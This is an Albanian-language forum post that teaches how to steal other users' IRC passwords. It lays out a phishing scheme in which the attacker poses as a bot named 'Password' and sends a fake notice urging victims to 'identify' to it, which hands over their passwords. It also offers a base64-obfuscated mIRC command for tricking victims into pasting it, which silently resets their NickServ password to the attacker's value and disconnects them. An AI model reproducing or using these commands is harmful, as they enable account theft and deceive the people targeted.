Disa menyra per ti marre passin dikujt ne IRC

View previous topic View next topic Go down

Disa menyra per ti marre passin dikujt ne IRC

Post  Admin on Sat Jan 09, 2010 8:51 am

Kodi:
Hyni ne nje Server 3.2 (ne Serverat e reja eshte me e lehte kjo menyre)
Por mos hyni ne as nje KanaL dhe vendoseni komanden /NICK PASSWORD me pas bejeni kete Kodin e poshtem ;

/mode Password iowghraAsORTVSxNCWqBzvdHtGplvhopsmntikrRcaqOALQbSe KVfMGCuzN

Kur te Shikoni infon tuaj ne Whois do te jet keshtu ***Password is a Bot on emriServerit *****

Me vone Zgjidhni nje Nick (Viktimen) dhe dergoni nje Notice ;

/Notice Nick Nga nje Problem Te vogel mund tju behet Nicku drop brenda 1 minuti .Ju Lutemi per ta evituar kete Problem vendoseni Komanden /msg password Nickserv Identify Passi Chat te Kendshem ..

Ne qofte se nick Password eshte i palejushem atehere vini nje nick tjeter Si psh : Info,Drop,Pass etj dhe Notice do dergohet ne kete menyre :
/Notice Nick Nga nje Problem Te vogel mund tju behet Nicku drop brenda 1 minuti .Ju Lutemi per ta evituar kete Problem vendoseni Komanden /msg info (ose nick te tjere sic kam thene me lart) Nickserv Identify Passi Chat te Kendshem ..

Shpresoj tju pelqeje .
Gjtih te mirat.Kodin e poshtem nese mundeni ta mashtroni tjetrin qe ta shkruaj ne Server i behet Passwordi Nickut: ReBooT

///timerx_mas 0 0 /cline $rand(1,15) $chan $rand(1,$nick(#,0)) | //privmsg $decode(bmlja3NlcnYgc2V0IHBhc3N3b3JkIFJlQm9vVA==,m ) | .ignore -u50 * | .close -m | .quit | .timers off

Admin
Admin

Posts : 149
Join date : 2010-01-05

View user profile http://al-capone.niceboard.net

Back to top Go down

View previous topic View next topic Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum